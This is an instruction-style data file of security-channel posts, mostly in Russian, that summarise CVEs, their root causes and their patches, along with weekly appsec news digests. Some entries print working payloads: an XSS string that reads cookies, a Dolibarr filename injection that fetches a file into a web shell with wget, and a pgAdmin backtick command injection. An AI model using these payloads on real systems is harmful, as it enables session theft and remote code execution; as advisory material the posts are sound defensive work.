| Instruction,Input,Response |
| Write a post on the following topic,Linux Kernel information disclosure vulnerability analysis CVE-2020-28588,Linux Kernel /proc/pid/syscall information disclosure vulnerabilityДетальный разбор CVE-2020-28588 (раскрытие информации в Linux Kernel 5.1 и 5.4.66).https://talosintelligence.com/vulnerability_reports/TALOS-2020-1211 |
| Write a post on the following topic,"""Developing a Proof of Concept for CVE-2020-28018 in Exim""",From theory to practice: analysis and PoC development for CVE-2020-28018 (Use-After-Free in Exim)...building a PoC for one of the vulnerabilities published by Qualys in Eximhttps://adepts.of0x.cc/exim-cve-2020-28018/ |
| Write a post on the following topic,Trojan Source: вектор атаки на исходный код программного обеспечения,"Ученые изКембриджскогоуниверситетавСоединенномКоролевствераскрыли обнаруженный еще25июлявекторатакиTrojan Source, позволяющий внедрять уязвимости в исходный код программного обеспечения таким образом, чтобы рецензенты не могли их обнаружить, что создает угрозу популярному ПО и цепочкам поставок.Trojan Sourceиспользует простой прием, который не требует модификации компилятора или прочих ухищрений, затрагиваяC, C ++, C #, JavaScript, Java, Rust, Go и Python.Вся фишка состоит в использовании управляющих символовUnicodeдля изменения порядка токенов в исходном коде на уровне кодирования.Каквыяснилось, используя управляющие символы, встроенные в комментарии и строки, злоумышленник может переупорядочить исходный код, чтобы не меняя визуальной картинки изменить его логику таким образом, чтобы создать уязвимость, которую можно впоследствии поэксплуатировать.РеализацияTrojan Sourceпроисходит по двум сценариям:CVE-2021-42574(илидвунаправленнаяатака) иCVE-2021-42694(гомоглифическаяатака).В первом случае применяются элементы управленияUnicodeдля двунаправленного текста, чтобы определять направление, в котором отображается контент. К примеру,LRI и RLI.Двунаправленные (Bidi) элементы управленияLRIиRLIявляются невидимыми символами, и они не единственные. Вводя эти инструкции, компилятор может скомпилировать код, полностью отличный от того, что видит человек.Внедряя символы переопределенияUnicodeBidiв комментарии и строки, злоумышленник может создать синтаксически корректный исходный код на большинстве современных языков, для которого порядок отображения символов представляет собой логику, отличающуюся от реальной логики.Второй вариант атаки основывается на применениигомоглифов, то есть разных символов, которые хоть и имеют одинаковое визуальное представление, но реализуют разный функционал. Человеческий глаз будет видеть обе функции идентичными, в то время как компилятор различает латинскую «H» и кириллическую «H» и обрабатывает код как имеющий две разные функции, поэтому результат разным.Оказывается также, что символыBidiсохраняются при копировании/вставке в большинстве браузеров, редакторов и операционных систем.Trojan Sourceработает практически во редакторах кода и веб-репозиториях (оцените сами ниже втаблице)За свои изыскания научные деятели получили в среднем2 246 долларовпоbugbounty. НаGitHubонипредоставилиPoC, которые демонстрируют, насколько серьезной угрозой может быть атака: тем более, чтоTrojan Sourceзатрагивает почти все компьютерные языки, а патчи еще толком не выпущены, оставляя уязвимыми почти два десятка поставщиков программного обеспечения." |
| Write a post on the following topic,Log4Shell уязвимость (CVE-2021-44228),"Ещё пара ссылок по теме Log4Shell (CVE-2021-44228):1.https://github.com/christophetd/log4shell-vulnerable-app— минимальный пример уязвимого приложения;2.https://github.com/Cybereason/Logout4Shell— ""вакцина"", эксплуатирующая уязвимость и изменяющая конфигурацию текущего экземпляра логгера атакованного приложения таким образом, чтобы сделать его неуязвимым к данной атаке :)" |
| Write a post on the following topic,"""Unauthenticated RCE in H2 Database Console""","The JNDI Strikes Back – Unauthenticated RCE in H2 Database ConsoleVery recently, the JFrog security research team has disclosed an issue in the H2 database console which was issued a critical CVE – CVE-2021-42392. This issue has the same root cause as the infamous Log4Shell vulnerability in Apache Log4j (JNDI remote class loading).https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/" |
| Write a post on the following topic,"""Обнаружение уязвимости удаленного выполнения кода в Java Spring Framework""","Встречайте,Spring4Shell. Правда, если сравнивать обнаруженнуюRCEв Java Spring FrameworkсLog4Shell, эффект которой можно назвать бомбой, то новая0-Dayскорее всего на этом фоне будет выглядеть как связка петард.Уязвимость удаленного выполнения кода былаобнаруженав среде Spring вскоре после того, как некий китайский исследователь, которыйвыпустилнаGitHubсоответствующийPoC, который вскоре после этого удалил вместе со своими аккаунтами.Spring- достаточно популярная платформа для создания приложений на основеJava EE (Enterprise Edition), которая позволяет быстро и легко их разрабатывать, а затем и разворачивать на серверах, в том числеApache Tomcat, в виде автономных пакетов со всеми необходимыми зависимостями.ПоданнымPraetorian, непропатченная уязвимость затрагиваетSpring CoreвJava Development Kit (JDK)версии 9 и более поздних и является обходом другой уязвимости, отслеживаемой как CVE-2010-1622, что позволяет злоумышленнику, не прошедшему проверку подлинности, выполнять произвольный код в целевой системе.Дополнительные сведения о новой уязвимости не разглашаются, специалисты по поддержке фреймворкаSpring.io, дочерняя компанияVMware, вовсю работают над исправлением.Новая бага отличается от двух предыдущих уязвимостей, раскрытых в структуре приложения на этой неделе, включаяDoS-уязвимость выраженийSpring Framework(CVE-2022-22950) и уязвимость доступа к ресурсам выраженийSpring Cloud(CVE-2022-22963).Spring RCEвызвана небезопасной десериализацией переданных аргументов.Praetorianтакже подтвердила, что ошибка зависит от определенных конфигураций для правильного использования. Для эксплуатации требуется конечная точка с включеннымDataBinder(например, запросPOST, который автоматически декодирует данные из тела запроса) и сильно зависит от контейнера сервлетов для приложения.Например, когдаSpringразвернут наApache Tomcat, доступенWebAppClassLoader, что позволяет злоумышленнику вызывать геттеры и сеттеры, чтобы в конечном итоге записать вредоносныйJSP-файл на диск. Однако, еслиSpringразвернут с использованием встроенного контейнера сервлетовTomcat, загрузчик классов — этоLaunchedURLClassLoader, доступ к которому ограничен.В некоторых конфигурациях эксплуатация этой проблемы проста, поскольку для этого требуется, чтобы злоумышленник отправил созданный запросPOSTв уязвимую систему.ПомнениюспециалистовFlashpoint, первоначальный анализ новой уязвимости выполнения кода вSpring Coreпредполагает, что ее влияние может быть несерьезным. Для эксплуатации уязвимости злоумышленникам необходимо будет найти и идентифицировать экземпляры веб-приложений, которые на самом деле используютDeserializationUtils.Кроме того, несмотря на общедоступность эксплойтов,Rapid7утверждают, что в настоящее время неясно, какие реальные приложения используют уязвимую функциональность.ISACзаявили, что еще не завершили свои тесты и не могут однозначно подтвердить действительностьPoCдля ошибкиRCE.Вместе с тем, согласно заключению аналитикаУилла ДорманнаизCERT/CC, эксплойтSpring4Shellв дикой природе все же функционирует и существуют реальные уязвимые приложения. Вообще, по данным источниковBleepingComputer, уязвимость активно используется в атаках.Поскольку для этой уязвимости в настоящее время нет исправления, настоятельно рекомендуется как можно скорее реализовать меры по смягчению атак, связанных с ограничениями функционалаSpring Core DataBinder." |
| Write a post on the following topic,Новости из мира безопасной разработки,"Всем привет! 💥🎙 Сегодня начинаем еженедельную подборку новостей из мира безопасной разработки.Дайте знать реакциями как вам формат?📌Делимсярезультатами исследования Positive Technologies, проведенного на Positive Hack Days 11.📌Разоблачение популярных мифовоб аппаратных закладках в процессорах📌 3100 Django-приложенийоказались уязвимы из-за включённого режима отладки📌 Израильские исследователипредставили метод скрытой передачи данныхс помощью SATA-кабелей📌Краткий обзорнынешней ситуации в области пост-квантовой криптографии📌 Исследователи из NCC Groupопубликовали ряд уязвимостей протокола ExpressRLS— наиболее популярного на сегодняшний день протокола радиоуправления любительскими дронами📌 Разбор уязвимостиCVE-2022-21449 в Java 15-18, позволявшей обойти механизм проверки ECDSA-подписи и подделать подписываемое сообщение📌ОпубликованТОП докладов технического трекаPHDays 11📌Microsoftпредставила детальный разбор уязвимости, позволявшей выйти из песочницы OSX#мероприятия" |
| Write a post on the following topic,Еженедельная подборка новостей в области кибербезопасности и разработки ПО,"🧾 Ловите еженедельную подборку новостей от POSIdev📌Опубликован код фреймворкарантайм-защиты Pulsar, ориентированный на IoT-инфраструктуры📌Что такое mass assignmentи как детектировать этот класс уязвимостей с помощью GitHub CodeSearch📌Детальный разбор CVE-2022-20186(LPE через Arm Mali GPU kernel driver) и техники её эксплуатации📌Автор деобфускатора REstringerподелился деталями его разработкии внутреннего устройства📌Опубликована очередная awesome-подборка. На этот раз - материалы и ресурсы, посвящённые криптографии открытого ключа📌Аналитики из Palo Alto Networksрассказали о том, что поиски уязвимых хостов в сети начинаются уже через 15 минут после публикации CVE об очередной уязвимости🔐" |
| Write a post on the following topic,аналитика киберугроз и управление уязвимостями,"📝 Подборка новостей отPOSIdev◾️ Positive Technologiesопубликовали аналитику по киберугрозам за II квартал 2022 года◾️ В инфраструктуру языка Goдобавили средства управления уязвимостями◾️ Обновлена электронная версия книги Дениса Юричева ""SAT/SMT by Example""◾️ Драйвер античита игры Genshin Impactиспользовался в корпоративных атаках◾️Опубликован детальный разборуязвимости CVE-2022-31814 (RCE в pfBlockerNG)🔐#новости" |
| Write a post on the following topic,"""Еженедельная подборка новостей о кибербезопасности от POSIdev""","📃Еженедельная подборка новостей от POSIdev📌Разбор свежей уязвимостик RCE через SSRF в Microsoft Office Online Server📌 Группа ресёрчеров Cybernewsподелилась результатами исследованияо раскрытии каталогов .git в opensource-проектах📌Первая часть статьи от Cyberark, посвящённая реверсингу руткитов и драйверов📌Новая реинкарнация старой уязвимостиот PortSwigger, HTTP/3 connection contamination📌 В Java-библиотеке Apache Commons Text найдена трендовая уязвимость (CVE-2022-42889), которая может привести к удаленному выполнению кода.Завтра мы выпустим про неё подробный материал💥_________________Хотите поделиться своей новостью? Пишите наtelegram@posidev.ioи мы опубликуем её в следующих постах.#новости" |
| Write a post on the following topic,уязвимость CVE-2023-2825 в GitLab,"🔥Хотим рассказать о еще однойуязвимости CVE-2023-2825, которую считаем трендовой. Уязвимость с уровнем CVSS3.1: 10.0 затрагивает продукты GitLab Community и Enterprise Edition версии 16.0.0.🆘К чему может привестиНеавторизованный злоумышленник может использовать уязвимость обхода директорий для чтения произвольных файлов при условии существования публичного проекта управляемого как минимум пятью группами пользователей. Успешная эксплуатация может привести к раскрытию кода проектов, утечке учетных данных пользователей и другой чувствительной информации.Предположительно, проблема связана с тем, как именно GitLab работает с путями прикрепленных файлов, вложенных в несколько уровней иерархии групп. В связи с критически опасным уровнем уязвимости вендор настоятельно рекомендует выполнить обновление как можно быстрее.✅РекомендацииМы также рекомендуем выполнить оперативное обновление. Пока оно не будет произведено, необходимо контролировать публичные проекты, чтобы не допустить возможность эксплуатации уязвимости.💻 Информации о существовании публично доступного PoC или об эксплуатации уязвимости в хакерских атаках пока нет.#PositiveTechnologies" |
| Write a post on the following topic,Уязвимость CVE-2023-42793 в JetBrains TeamCity,"⚠️ Внимание! Трендовая уязвимостьCVE-2023-42793в JetBrains TeamCity.TeamCity — решение для непрерывной интеграции и доставки ПО (CI/CD). Уязвимость вызвана недостаточным контролем доступа к API сервера и позволяет неаутентифицированному злоумышленнику получить доступ к панели администратора.Под угрозой находятся компании-разработчики ПО.Эксплуатация данной уязвимости позволяет злоумышленнику, имеющему сетевой доступ к серверу TeamCity, получить исходные коды проектов и развить дальнейшую атаку на инфраструктуру при помощи выполнения произвольного кода на агентах исполнения задач сборки проектов.Уязвимость может привести к недопустимым для вендоров событиям.❗️По рекомендациям вендора,для устранения уязвимости необходимо обновить сервер TeamCity до версии 2023.05.4. Для снижения рисков, связанных с уязвимостью, необходимо установить плагин с исправлением от вендора.🆘Что делатьПроверьте узлы на наличие уязвимостиCVE-2023-42793с помощьюMaxPatrol VM.Если установлены последние обновления базы знаний, уязвимые активы будут определены автоматически.@Positive_Technologies" |
| Write a post on the following topic,Уязвимость CVE-2023-5009 в GitLab позволяет запустить пайплайн без контроля,"CVE-CVE-2023-5009 в системе контроля версии GitLab продуктов CE и EE версий от 13.12 до 16.2.7, от 16.3 до 16.3.4, позволяет запустить пайплайн через запланированные политики сканирования безопасности, что может привести к утечкам данных и к атакам на цепочки поставок. В рамках исправления уязвимостиcommitбыли внесены корректировки переменных, отвечающих за планирование политик (заменаschedule.owner `на `security_policy_botилиsecurity_policy_bot_2)" |
| Write a post on the following topic,XSS-уязвимость в системе мониторинга сети LibRemMS,"CVE-CVE-2023-5060 в системе мониторинга сети LibRemMS, которая приводит к XSS. Для выполнения атаки достаточно ввести в поле IP4 поисковой формы""><script>alert(document.cookie)</script>. В процессе исправления уязвимости была добавлена функция экранирования HTML-спецсимволовhtmlspecialchars($_POST['address'])." |
| Write a post on the following topic,Уязвимость XSS в приложении HestiaCP до версии 1.8.8,CVE-CVE-2023-5084 в приложении hestiacp до версии 1.8.8 (панель управления web-приложением) приводит к множественным XSS. Атака возможна с подменой параметровv_timezoneиv_backend_templateв теле запроса. Исправление уязвимостиcommitисключает использования параметраv_backend_templateдля формирования ответа и реализует проверку на «белый» список параметраv_timezone. |
| Write a post on the following topic,Уязвимость выполнения произвольного кода в Dolibarr ERP CRM,"CVE-CVE-2023-38886 в системе Dolibarr ERP CRM до версии 17.0.1, позволяет привилегированному удаленному пользователю выполнить произвольный код. Для реализации атаки используется функционал backup и поле для ввода имени файла с полезной нагрузкойwget 192.168.1.167 && mv index.html shell.php. В приложении некорректно реализована функция санитизации введенного значения имени файла. Полный разбор уязвимости опубликован здесь." |
| Write a post on the following topic,XSS уязвимость в почтовом веб-клиенте Roundcube,"CVE-CVE-2023-43770 в почтовом веб-клиенте Roundcube до 1.4.14, 1.5.x до 1.5.4, и 1.6.x до 1.6.3 позволяет выполнить XSS через полученное e-mail сообщение. Причина уязвимости заключается в отсутствии проверки пользовательских данных на символы<,>, в результате появляется возможность инъекции тегов html-кода. При исправлении проблемыcommitбыли добавлены символы<,>в шаблоны, используемые в контроле пользовательских данных." |
| Write a post on the following topic,Уязвимость аутентификации в JetBrains TeamCity,"CVE-CVE-2023-42793 в JetBrains TeamCity до версии 2023.05.4 позволяет обойти процесс аутентификации и в последствии выполнить произвольный код на атакуемом сервере. Проблема заключается в неправильном паттерне пути запроса (/**/RPC2), для которого были отключены предобработчики, в том числе и предобработчик аутентификации. Злоумышленник может обратиться к произвольному пути, в конец которого добавить/RPC2, что позволит обойти механизмы защиты. Исправление уязвимости заключается в указании правильного паттерна пути для RPC2 -/RPC2." |
| Write a post on the following topic,Уязвимость в pgAdmin позволяет выполнение произвольных системных команд.,"CVE-CVE-2023-5002 в платформе pgAdmin для администрирования PostgreSQL до версии 7.6 позволяет выполнить произвольные системные команды. Уязвимость заключается в отсутствии проверки значения параметраutility_pathв эндпойнте/misc/validate_binary_path, которое попадает в качестве первого аргумента в функциюsubprocess.getoutput.Первое исправлениене устранило уязвимость, была добавлена недостаточная санитизация пользовательских данных - замена одного символа двойной кавычки на два, что по прежнему позволяло выполнять произвольные команды, например, оборачивая их в обратные кавычки (``ls``). Вфинальном исправлениифункцияsubprocess.getoutputбыла реализована замена на более безопасный вариант -subprocess.runсshell=False.⁉️Хотите, чтобы эта#экспериментальная_рубрикастала постоянной? Ждём ваших реакций и комментариев👇" |
| Write a post on the following topic,Интересные публикации по аппсеку за прошедшую неделю,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰 Описание эффективной техникиобфускации in-memory сборок .NETот R-Tec.📰 И снова RSA, и снова Блейхенбахер, и снова оракулы...Оригиналстатьи о старой-новой атаке MARVIN, краткоесаммарина русском.📰Опытот VK по аппсеку внутренних ресурсов.📰 Краткаяисторияфункций парольного хэширования.📰 Очередная атака по побочным каналам, на этот раз на GPU, поэтому ""GPU.zip"".📰 Весьма годныйFAQпо проблемам безопасности многопоточных вычислений. Здесь же, нельзя не упомянуть о более ранних, но не менее годных статьях от PortSwigger на эту же тему (раз,два).📰 ДетальныйразборCVE-2023-35813 — атаки на древний, мамонтовый, но иногда всё ещё актуальный TemplateParser в ASP.Net WebForms.📰 Поучительнаяисторияо том, как DLL hijacking в WinDbg был исправлен в рамках багбаунти, но так и не получил подтверждённого CVE.📰Разборещё одной CVE-2023-38831, винрарной в самом прямом смысле этого слова🦄📰Статьяот Veracode об управлении секретами в условиях облачной разработки.⁉️Это — тоже#экспериментальная_рубрика. Что нужно делать, чтобы она стала постоянной, вы, впрочем, уже знаете👇" |
| Write a post on the following topic,Уязвимость в Progress Software WS_FTP Server связанная с небезопасной .NET десериализацией,"CVE-CVE-2023-40044 в платформе для обмена даннымиProgress Software WS_FTP Serverдо версий8.7.4и8.8.2позволяет неаутентифицированному атакующему выполнять произвольные команды с помощью эксплуатации небезопасной .NET десериализации. Уязвимость заключается в использовании небезопасной реализацииBinaryFormatter.Deserializeдля десериализации пользовательских данных, полученных из POST multipart запроса к эндпойнтам модуля ""Ad Hoc Transfer"" (/AHT) и последующего формирования экземпляра классаSettingsStorageObject, в котором содержатся только три публичных поля типа массива символов. В таких случаях разработчикам было бы достаточно реализовать свойSerializationBinder, в котором ограничить использование типов или использовать иные методы заполнения полей при формирования экземпляров класса, но в патче только была вырезана уязвимая функциональность. Для эксплуатации достаточно стандартных стандартных цепочек гаджетов из набораysoserial.net(например,DataSet)." |
| Write a post on the following topic,"Уязвимость в библиотеке libwebp, позволяющая выполнение записи за пределы кучи.","CVE-CVE-2023-4863 в библиотекеlibwebpдля обработки изображений формата WebP, исправленная в коммите902bc91,позволяет злоумышленнику выполнить запись за пределы кучи с помощью специально сформированногоwebpфайла. Уязвимость заключается в выделении буфераhuffman_tablesнекорректного размера внутри функцииReadHuffmanCodeи последующей записи в него данных, размер которых превышает это значение. Размерhuffman_tablesвычисляется на основе предварительно сформированного массиваkTableSize, который учитывает только размеры для поиска в 8-битной таблице первого уровня. Поскольку libwebp поддерживает коды длиной до 15 бит, проблема может возникнуть, когда функцияBuildHuffmanTableпопытается заполнить таблицы второго уровня. В патче была добавлена проверка корректности входных данных с помощью вызова функцииVP8LBuildHuffmanTableпри первом проходе (в котором еще не идет запись в таблицу Хаффмана) для расчета необходимого размера, если данные некорректны - выполнение завершается. Более подробный разбор уязвимости можно посмотреть вэтой статье." |
| Write a post on the following topic,Уязвимость чтения файлов в Gladys Assistant,"CVE-CVE-2023-43256 в платформе домашнего ассистентаGladys Assistantпозволяет привилегированному удаленному пользователю читать произвольные файлы на сервере. Уязвимость заключается в отсутствии проверки значений входящих параметров запросаfolderиfileв обработчике запросаgetStreamingFile(/api/v1/service/rtsp-camera/camera/streaming/:folder/:file). Значения данных параметров участвуют в формировании пути (path.join(gladys.config.tempFolder, req.params.folder, req.params.file)) для возвращаемого в ответе файла. Впатчебыла добавлена проверка входящих значений по строгому паттерну (/index[0-9]+.ts/) или наличие в массиве допустимых значений['index.m3u8', 'index.m3u8.key', 'key_info_file.txt']дляfileи/^camera-[a-zA-Z0-9-_]+$/дляfolder)." |
| Write a post on the following topic,Уязвимость удаления файлов в OpenCart (CVE-2023-2315),"CVE-CVE-2023-2315 в OpenCart с версии4.0.0.0до4.0.2.2позволяет аутентифицированному пользователю с правами на доступ/модификацию в компонентеLogудалять содержимое произвольных файлов на сервере. Уязвимость заключается в отсутствии санитизации параметра запросаfilenameу эндпойнтаtool/log.clear, который впоследствии попадает в функциюfopenс модификатором доступаw+для очистки файла.Патчдобавляет использование функцииbasenameпри извлечении из параметра запроса последнего компонента пути (имени файла)." |
| Write a post on the following topic,Обработка и безопасность входных данных в программировании,"Всем привет!👋(@vkochetkovздесь)Отбирая статьи для понедельничной рубрики, наткнулся на забавноеэссе, посвящённое проверкам входных данных. Должен признаться, я в душе не чаю, кто его автор — признанный ли он эксперт или нет... вроде раньше не слышал🤔Но пройти мимо и не прокомментировать, не смог.Дело в том, что сей Pedram, предлагая решать проблему обработки входных данных «зря в корень», похоже, даже близко себе не представляет, где этот корень находится. Рассмотрим на примере первой части статьи. В ней автор рассматривает примеры решений одного из челленджей SecDim, основанного наCVE-2021-43798, и отбраковывает одно за другим, апеллируя к тому, что они не устраняют корень проблемы. Корень же Path Traversal, по убеждению автора, заключается в (я цитирую):> is the lack of path canonicalizationИ здесь он глубоко ошибается. Канонизация, нормализация, валидация, санитизация и прочие «-ации» хороши тогда, когда применяются на уровне модели предметной области, а не на уровне синтаксиса весьма низкоуровневых сущностей, коими являются файловые пути. Причиной уязвимости здесь является протаскивание этих сущностей на уровень предметной области, вместо сокрытия за абстракциями. И грамотным подходом в данном случае было бы не «отдать пользователю файл по запрошенному пути», а «отдать пользователю запрошенный по буквенно-числовому идентификатору объект», а уже связь между этими идентификаторами и физическими файлами, устанавливать без участия пользователя, где-то на стыке слоя представления и слоя бизнес-логики.Возможно для кого-то это и окажется откровением, но уязвимости в том числе к инъекциям, зачастую, и в первую очередь, являются проблемами дизайна предметной области приложения, и только потом — синтаксическими багами про недостаточную предварительную обработку.Btw, предложенное автором решение никак не защищает от, например, обращения к альтернативным потокам NTFS, если приложение окажется (не дай бог, конечно) развёрнутым под виндой. Как и от внедрения нуль-байта, управляющих символов и прочих DoS через жестко-заданные в ОС файловые имена. Зависит от окружения, конечно, но кто ж так в корень-то смотрит?🤦♂️И потом, если уж мы протащили файловые пути на уровень бизнес-логики, то реализуя тем самым требование «отдать пользователю существующий файл по запрошенному, жестко-заданному пути». И вот что мешало вспомнить о принципе KISS и сделать как-то так — ума не приложу:if not str.isidentifier(filename) or filename not in os.listdir(""/resources""):return HttpResponseBadRequest()(почему не с помощьюos.path.exists()— пусть будет домашним заданием)На две трети решённая задача обеспечения безопасности приложения — это грамотный дизайн его архитектуры и модели предметной области.А не вот это вот всё... 🫠❗️И да, это тоже#экспериментальная_рубрика. А вы как думали?👇" |
| Write a post on the following topic,Уязвимость LDAP инъекции в phpIPAM до версии 1.5.2,"CVE-CVE-2023-41580 , обнаруженная в платформе управления IP-адресамиphpipamдо версии1.5.2,позволяет аутентифицированному атакующему получать конфиденциальные данные из хранилища через LDAP инъекцию. Уязвимость заключается в отсутствии санитизации пользовательских данных, попадающих в функцию$adldap->user()->info, которая формирует LDAP запросы для получения данных о пользователе. Висправленииданные, попадающие в LDAP запрос, проходят через экранирующую функциюldap_escapeс флагомLDAP_ESCAPE_DN." |
| Write a post on the following topic,Уязвимость десериализации в клиенте Redisson до версии 3.22.0.,"CVE-CVE-2023-42809 в клиентеRedissonдо версии3.22.0позволяет исполнять произвольный код при подключении к вредоносному серверу. Уязвимость заключается в попадании пользовательских данных вфункциюObjectInputStream.readObjectи их небезопасной десериализации. Впатчебыл добавлен ""белый"" список классов, который определяет разрешенные объекты при десериализации. Упрощению эксплуатации способствует наличие в составе Redisson библиотеки ""Apache Commons Collections 4"", для которой существует стандартный ysoserial гаджет ""CommonsCollections2""." |
| Write a post on the following topic,Аутентификационная уязвимость в социальной медиа платформе Misskey,"CVE-CVE-2023-43793 в децентрализованной социальной медиа платформеMisskeyдо версии2023.9.0позволяет обходить процесс аутентификации, для эндпойнтов, начинающихся с/queue. Проблема затрагивала процедуру сравнения пути эндпойнта сзакодированнымURI, что обеспечивало обход процесса аутентификации. ВисправленииURI запроса перед его сравнением декодируется при помощи функцииdecodeURI." |
| Write a post on the following topic,"Уязвимость в библиотеке HtmlSanitizer, позволяющая обходить санитизацию HTML.","CVE-CVE-2023-44390 , выявленной в .NET библиотеке html-санитизацииHtmlSanitizerдо версии8.0.723, позволяет обходить процесс санитизации и добавлять вредоносные html-объекты. В библиотеке данные, находящиеся в комментариях или в текстовых полях html документа, обрабатывались без экранирования. Для этих случае впатчебыла добавлена замена символов""<""и"">""на их html-мнемоники (""<""и"">"")." |
| Write a post on the following topic,"Уязвимость в библиотеке geokit-rails, позволяющая выполнение произвольных команд через небезопасную YAML десериализацию.","CVE-CVE-2023-26153 в библиотеке для работы с геолокациейgeokit-railsдо версии2.5.0позволяет неаутентифицированному атакующему выполнять произвольные команды с помощью эксплуатации небезопасной YAML десериализации. Проблема связана с попаданием значения""geo_location""куки в уязвимую функциюYAML.load. Дляисправленияуязвимости функциюYAML.loadзаменили на безопасную функциюJSON.parse." |
| Write a post on the following topic,"""Уязвимость CVE-2023-44487 в протоколе HTTP/2""","CVE-CVE-2023-44487 в протоколеHTTP/2. Проблема связана с дизайном протокола HTTP/2 и касается возможности одностороннего сброса потока отправкойRST_STREAM, что в итоге позволяет создавать неограниченное количество новых потоков для сервера и приводит к отказу в обслуживании. Многие разработчики библиотек, реализующих протокол HTTP/2, уже добавляют механизмы контроля количества новых потоков (клон Nginxtengine,jetty,envoy, пакет gox/net/http2и т.д). Ссылку на подробный разбор ищите в нашем предыдущем новостном посте." |
| Write a post on the following topic,Обход процесса валидации ID токена в платформе Micronaut Security.,"CVE-CVE-2023-36820 в платформеMicronaut Securityдо версий3.1.2, 3.2.4, 3.3.2, 3.4.3, 3.5.3, 3.6.6, 3.7.4, 3.8.4, 3.9.6, 3.10.2 и 3.11.1приводит к обходу процесса валидации IDтокена. Проблема заключается в отсутствии проверки значенияaudна соответствие идентификатору клиентапри условии, что в настройках значениеmicronaut.security.authenticationвыставлено вidtoken,а также значениеissсовпадает со значением текущего эмитента приложения. Впатческорректирована логика валидации токена через использование логического оператора ""и"" (&&) вместо""или"" (||)." |
| Write a post on the following topic,Уязвимость DOM-based XSS в приложении Piwigo до версии 14.0.0beta4,"CVE-CVE-2023-44393 ,выявленная в приложенииPiwigoдо версии14.0.0beta4, приводит к возможности внедрения дополнительных DOM сущностей в состав HTML документа. Уязвимость заключается в отсутствии санитизации пользовательских данных ($_GET['plugin_id']), попадающих в переменную$activate_url, которая участвует в формировании тела ответа. Висправлениибыл исключен канал воздействия путем удаления$_GET['plugin_id']из формирования значения переменной$activate_url." |
| Write a post on the following topic,"Уязвимость в веб-интерфейсе OctoPrint, позволяющая выполнение произвольного кода.","CVE-CVE-2023-41047 в веб-интерфейсе для 3D принтеровOctoPrintдо версии1.9.3позволяет привилегированным пользователям выполнять произвольный код путем создания специально сформированных GCODE-скриптов. Уязвимость состоит в использовании небезопасного jinja2-окруженияjinja2.sandbox.Environmentпри работе с шаблонами.Патчзаменяетjinja2.sandbox.Environmentна более безопасный вариант -jinja2.sandbox.SandboxedEnvironment,в котором при попытке исполнения небезопасного кода будет выдано исключениеjinja2.sandbox.SecurityError." |
| Write a post on the following topic,Уязвимость в десериализации с использованием библиотеки pickle в платформе vantage6,"CVE-CVE-2023-23930 ,найденная в платформе для обученияvantage6до версии4.0.0, заключается в использовании небезопасной реализации процесса десериализации с использованием библиотекиpickle, что может привести к исполнению произвольного кода. Висправленииуязвимая функцияpickle.loadsбыла заменена на безопасный вариант -json.loads." |
| Write a post on the following topic,Обзор новостей и обновлений в области информационной безопасности и аппсека,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰 Обновился полезныйплагиндля Burp Suite, позволяющий разбирать сообщения Protobuf без наличия .proto-определений.📰РазборCVE-2023-2729 (использование небезопасного PRNG в девайсах Synology NAS).📰Объяснениеатак удлиннением сообщения и HMAC от небезызвестного Дениса Юричева.📰 Вновь очереднаяаббревиатурао том, как правильно писать код. Вновь на букву «S»... и вновь эта буква означает отнюдь не «Security» 😢 Но почитать всё же стоит, советы-то дельные.📰 Вышлопродолжениеувлекательнойстатьио разработке crackme-задания.📰РазборCVE-2023-34040 (RCE через небезопасную десериализацию в Spring Kafka).📰Переводлюбопытного эссе о рисках чрезмерного увлечения абстракциями в разработке." |
| Write a post on the following topic,Уязвимость SQL-инъекции в LibreNMS,"CVE-CVE-2023-5591 , обнаруженная в системе мониторинга сетиLibreNMSдо версии23.10.0, приводит к SQL-инъекции. Проблема заключается в использовании значения параметраaddressиз POST-запроса в функции для формирования и исполнения SQL-запросаdbFetchRows. Дляисправленияуязвимости формирование SQL-запроса стало выполняться параметризированным способом." |
| Write a post on the following topic,Уязвимость OS Command Injection в web-фреймворке web2py,"CVE-CVE-2023-45158 в web-фреймворкеweb2pyдо версии2.24.1для модуляmessageboxhandlerи функцииnotifySendHandlerобнаружена уязвимостьOS Command injection. Уязвимость заключается в возможности попадания пользовательских данных в функцию логирования, внутри которой данные обрабатываются с использованиемos.system. Впатчебыла произведена заменаos.systemнаsubprocess.runи пользовательские данные включены в элемент массива для аргумента команды, что исключает выполнение команды ОС." |
| Write a post on the following topic,XSS уязвимость в плагине Discourse Calendar,"CVE-CVE-2023-43658 ,обнаруженная в плагине календаря дляDiscource dicourse-calendar, позволяет злоумышленникам внедрить произвольные html-сущности в состав ответа сервера, что приводит к XSS. Прямая запись пользовательских заголовков эвентов ( event_name ) в состав html-страницы, приводит к появлению данной проблемы.Патчдобавляет функциюCGI.escape_htmlдля конвертации недопустимых символов в их html-представления." |
| Write a post on the following topic,Уязвимость stored XSS в Roundcube,"CVE-CVE-2023-5631 в почтовом web-клиентеRoundcubeдо версии1.4.15, 1.5.x до 1.5.5 и 1.6.x до 1.6.4может приводить к stored XSS в теле HTML сообщения электронной почты. Проблема находится в файлеprogram/lib/Roundcube/rcube_washtml.phpв функцииwash_uri, некорректно обрабатывающей разделительные символы для типа контента в составе URI SVG изображения. Впатчебыл введен механизм удаления разделительных символов из URI." |
| Write a post on the following topic,"Уязвимость в веб UI Cisco IOS XE, позволяющая создание аккаунта с максимальными привилегиями.","CVE-CVE-2023-20198 в веб UI компонентеCisco IOS XEдо версий17.9.4a, 17.6.6a, 17.3.8a и 16.12.10aпозволяет неаутентифицированному злоумышленнику создать аккаунт с максимальным уровнем привилегий. Часть уязвимости заключается в логике проверки IPv6 адреса в функцииutils.isIpv6Address(ip), которая в ряде случаев используется для контроля данных, попадающих в состав cli-команд. В исправлении разработчики в механизме контроля IPv6 адреса скорректировали шаблон на^([a-fA-F0-9:]+)$и ввели дополнительные проверки на длину адреса и их значение." |
